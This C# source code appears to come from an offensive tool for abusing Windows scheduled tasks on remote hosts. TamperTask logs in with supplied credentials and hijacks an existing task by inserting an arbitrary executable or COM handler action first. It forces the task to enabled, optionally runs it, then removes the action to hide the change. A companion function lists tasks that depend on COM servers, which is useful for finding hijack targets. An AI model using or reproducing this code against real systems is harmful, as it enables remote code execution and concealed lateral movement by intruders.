/// <summary>
/// Renders a scheduled-task action as a one-line description for display.
/// </summary>
/// <param name="action">The action to describe; any action subtype (or null) is accepted.</param>
/// <returns>
/// For an <see cref="ExecAction"/>: its path and arguments separated by a space.
/// For a <see cref="ShowMessageAction"/>: <c>Show message: '&lt;title&gt;'</c>.
/// For a <see cref="ComHandlerAction"/>: <c>COM handler: '&lt;class name&gt;'</c>.
/// For an <see cref="EmailAction"/>: <c>Send email: '&lt;subject&gt;'</c>.
/// Anything else (including null): the literal <c>unknown action.</c>.
/// </returns>
private string GetCommandText(Action action)
{
    // Guard clauses, checked in the same order as the original type tests so that the
    // first matching subtype wins.
    ExecAction exec = action as ExecAction;
    if (exec != null)
    {
        return $"{exec.Path} {exec.Arguments}";
    }

    ShowMessageAction message = action as ShowMessageAction;
    if (message != null)
    {
        return $"Show message: '{message.Title}'";
    }

    ComHandlerAction comHandler = action as ComHandlerAction;
    if (comHandler != null)
    {
        return $"COM handler: '{comHandler.ClassName}'";
    }

    EmailAction email = action as EmailAction;
    if (email != null)
    {
        return $"Send email: '{email.Subject}'";
    }

    return "unknown action.";
}
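/// <summary>
/// Walks <paramref name="tf"/> and its sub-folders and writes one tab-separated row for every
/// task action that is a COM handler, resolving the handler's CLSID in the registry so the rows
/// can be used to audit which scheduled tasks depend on which in-proc COM servers.
/// </summary>
/// <param name="output">Receives the rows; nothing is written for tasks without COM actions.</param>
/// <param name="tf">Root folder of the walk; every sub-folder is visited recursively.</param>
/// <remarks>
/// Row columns, in order: task path, task name, CLSID, action data, default value of the CLSID
/// key (server name), InprocServer32 default value (server path), ThreadingModel, and "Yes"/"No"
/// for whether that path loads as a managed assembly. The registry lookup is best-effort: a
/// missing key, a missing value or an access failure leaves the affected columns empty instead
/// of aborting the walk. Registry keys are released after each task action (the original left
/// both keys undisposed, and dereferenced a missing key inside the swallowed catch).
/// NOTE(review): the CLSID is resolved in the local HKEY_CLASSES_ROOT. If <paramref name="tf"/>
/// comes from a remote TaskService, the server columns describe this machine, not the task's
/// host — confirm against the caller.
/// </remarks>
static void FindTaskWithComAction(System.IO.TextWriter output, TaskFolder tf)
{
    foreach (Task t in tf.Tasks)
    {
        foreach (Microsoft.Win32.TaskScheduler.Action ac in t.Definition.Actions)
        {
            ComHandlerAction a = ac as ComHandlerAction;
            if (a == null)
            {
                continue;
            }

            string name = null, model = null, path = null, asm = null;
            // "B" format yields the braced form used by CLSID key names.
            string clsid = a.ClassId.ToString("B");
            try
            {
                // Un-redirected path first, then the Wow6432Node path. A null resource is legal
                // in 'using' (Dispose is simply skipped), so the two lookups can be chained and
                // whichever key was opened is always released.
                using (Microsoft.Win32.RegistryKey k =
                    Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("CLSID\\" + clsid)
                    ?? Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("Wow6432Node\\CLSID\\" + clsid))
                {
                    if (k != null)
                    {
                        name = k.GetValue(null, "").ToString();
                        using (Microsoft.Win32.RegistryKey sk = k.OpenSubKey("InprocServer32"))
                        {
                            if (sk != null)
                            {
                                path = sk.GetValue(null, "").ToString();
                                if (!string.IsNullOrEmpty(path))
                                {
                                    // GetAssemblyName throws for a file that is not a managed
                                    // assembly or cannot be opened; either way the answer is "No".
                                    try
                                    {
                                        System.Reflection.AssemblyName.GetAssemblyName(path);
                                        asm = "Yes";
                                    }
                                    catch (System.Exception)
                                    {
                                        asm = "No";
                                    }
                                }
                                model = sk.GetValue("ThreadingModel", "").ToString();
                            }
                        }
                    }
                }
            }
            catch (System.Exception)
            {
                // Deliberately best-effort (e.g. access denied on the key): the inventory must not
                // stop here; the row below is still emitted with whatever was resolved so far.
            }
            output.WriteLine("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}\t{7}", t.Path, t.Name, a.ClassId, a.Data, name, path, model, asm);
        }
    }

    foreach (var f in tf.SubFolders)
    {
        FindTaskWithComAction(output, f);
    }
}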
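/// <summary>
/// Prepends an action to an existing scheduled task on <paramref name="host"/>, re-registers
/// the task, optionally triggers it, then removes the action and re-registers the task again.
/// </summary>
/// <param name="task">Task path as accepted by <c>TaskService.GetTask</c>.</param>
/// <param name="binary">
/// Either a CLSID — recognised purely by having five '-'-separated parts — which becomes a
/// COM handler action, or anything else, which becomes an exec action's path.
/// </param>
/// <param name="arguments">Arguments for the exec action; unused in the COM case.</param>
/// <param name="run">When true, the task is triggered once the extra action is registered.</param>
/// <param name="host">Host passed to <c>AuthenticateToRemoteHost</c>.</param>
/// <param name="username">Credential passed to <c>AuthenticateToRemoteHost</c>.</param>
/// <param name="password">Credential passed to <c>AuthenticateToRemoteHost</c>.</param>
/// <param name="domain">Credential passed to <c>AuthenticateToRemoteHost</c>.</param>
/// <remarks>
/// Observable side effects on the target: the task definition is registered twice (once with
/// the extra action at index 0, once without it) and <c>Settings.Enabled</c> is forced to true
/// and is not restored afterwards. A string with five dash-separated parts that is not a valid
/// GUID makes <c>new Guid</c> throw a <see cref="FormatException"/>. Returns silently when
/// authentication yields null or the task does not exist (the latter prints a message).
/// The two original branches were identical apart from the action constructed, so the
/// add / register / run / remove sequence now exists once.
/// </remarks>
private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain)
{
    TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);
    if (ts == null)
    {
        return;
    }

    Task t = ts.GetTask(task);
    if (t == null)
    {
        Console.WriteLine("[+] Task not found!");
        return;
    }

    // Only the action's construction depends on the input; everything after it is shared.
    Microsoft.Win32.TaskScheduler.Action action;
    if (binary.Split('-').Length == 5) // weak parsing, I know but YOLO
    {
        // we suppose we want to execute a COM object and not a binary
        action = new ComHandlerAction(new Guid(binary), string.Empty);
    }
    else
    {
        action = new ExecAction(binary, arguments, null);
    }

    // add to the top of the list, otherwise it will not execute
    Console.WriteLine("[+] Adding custom action to task.. ");
    t.Definition.Actions.Insert(0, action);
    // enable the task in case it's disabled
    Console.WriteLine("[+] Enabling the task");
    t.Definition.Settings.Enabled = true;
    t.RegisterChanges();
    GetTaskInfo(task, host, username, password, domain);
    Console.WriteLine("\r\n");
    // run it
    if (run)
    {
        Console.WriteLine("[+] Triggering execution");
        t.Run();
    }
    Console.WriteLine("[+] Cleaning up");
    // remove the new action
    t.Definition.Actions.Remove(action);
    t.RegisterChanges();
}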